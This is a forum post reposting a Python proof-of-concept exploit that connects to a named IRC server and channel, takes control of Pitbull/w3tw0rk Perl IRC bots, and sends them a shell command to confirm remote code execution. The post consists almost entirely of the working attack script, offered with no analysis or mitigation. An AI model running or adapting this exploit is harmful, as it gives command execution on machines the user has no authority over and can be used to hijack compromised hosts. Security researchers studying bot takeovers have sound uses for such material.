Jump to content
KhiZaRix

Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution

Recommended Posts

# thehunter.py

# Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution

# author: @shipcod3

# description: pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution.

import socket

import sys

def usage():

print("USAGE: python thehunter.py nick \n")

def main(argv):

if len(argv) < 2:

return usage()

#irc server connection settings

botnick = sys.argv[1] #admin payload for taking over the w3wt0rk bot

server = "us.dal.net" #irc server

channel = "#buhaypirata" #channel where the bot is located

irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket

print "connecting to:"+server

irc.connect((server, 6667)) #connects to the server

irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :I eat w3tw0rk bots!\n") #user authentication

irc.send("NICK "+ botnick +"\n") #sets nick

irc.send("JOIN "+ channel +"\n") #join the chan

irc.send("PRIVMSG "+channel+" :!bot @System 'uname -a' \n") #send the payload to the bot

while 1: #puts it in a loop

text=irc.recv(2040) #receive the text

print text #print text to console

if text.find('PING') != -1: #check if 'PING' is found

irc.send('PONG ' + text.split() [1] + '\r\n') #returnes 'PONG' back to the server (prevents pinging out!)

if text.find('!quit') != -1: #quit the Bot

irc.send ("QUIT\r\n")

sys.exit()

if text.find('Linux') != -1:

irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")

irc.send ("QUIT\r\n")

sys.exit()

if __name__ == "__main__":

main(sys.argv)

Source: http://packetstorm.wowhacker.com/1504-exploits/thehunter.txt

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...